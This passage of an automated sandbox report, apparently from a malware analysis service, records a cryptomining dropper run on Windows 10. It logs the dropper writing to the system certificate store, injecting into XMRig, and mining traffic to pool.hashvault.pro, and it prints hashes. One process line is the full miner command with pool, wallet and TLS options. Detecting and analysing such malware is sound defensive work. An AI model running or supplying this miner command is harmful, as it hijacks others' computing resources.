| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3356 wrote to memory of 2768 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3356 wrote to memory of 2768 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 131.253.33.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.33.253.131.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| NL | 23.62.61.137:443 | www.bing.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| NL | 23.62.61.137:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 137.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.179.89.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2768-14-0x000002862B750000-0x000002862B770000-memory.dmp
memory/2768-15-0x000002862D090000-0x000002862D0B0000-memory.dmp
memory/2768-16-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-19-0x000002862D0D0000-0x000002862D0F0000-memory.dmp
memory/2768-18-0x000002862D0B0000-0x000002862D0D0000-memory.dmp
memory/2768-17-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-20-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-21-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-23-0x000002862D0D0000-0x000002862D0F0000-memory.dmp
memory/2768-22-0x000002862D0B0000-0x000002862D0D0000-memory.dmp
memory/2768-24-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-25-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-26-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-27-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-28-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-29-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-30-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-31-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-32-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-33-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-34-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-35-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-36-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-37-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-38-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-39-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-40-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-41-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-42-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-43-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-44-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-45-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-46-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-47-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-48-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-49-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-50-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-51-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-52-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-53-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-54-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-55-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-56-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-57-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-58-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-59-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-60-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-61-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-62-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-63-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-64-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-65-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-66-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-67-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-68-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-69-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-70-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-71-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-72-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-73-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-74-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-75-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-76-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-77-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-78-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-79-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-80-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-81-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
memory/2768-82-0x00007FF6A1AA0000-0x00007FF6A25A3000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-13 07:36
Reported
2024-06-13 08:18
Platform
win10v2004-20240508-en
Max time kernel
1633s
Max time network
1646s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (10).exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-13 07:36
Reported
2024-06-13 08:18
Platform
win10v2004-20240611-en
Max time kernel
1793s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1012 wrote to memory of 2688 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1012 wrote to memory of 2688 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=1288,i,1236064252342462940,13180713657498721890,262144 --variations-seed-version --mojo-platform-channel-handle=4260 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4720,i,1236064252342462940,13180713657498721890,262144 --variations-seed-version --mojo-platform-channel-handle=3792 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| BE | 88.221.83.248:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
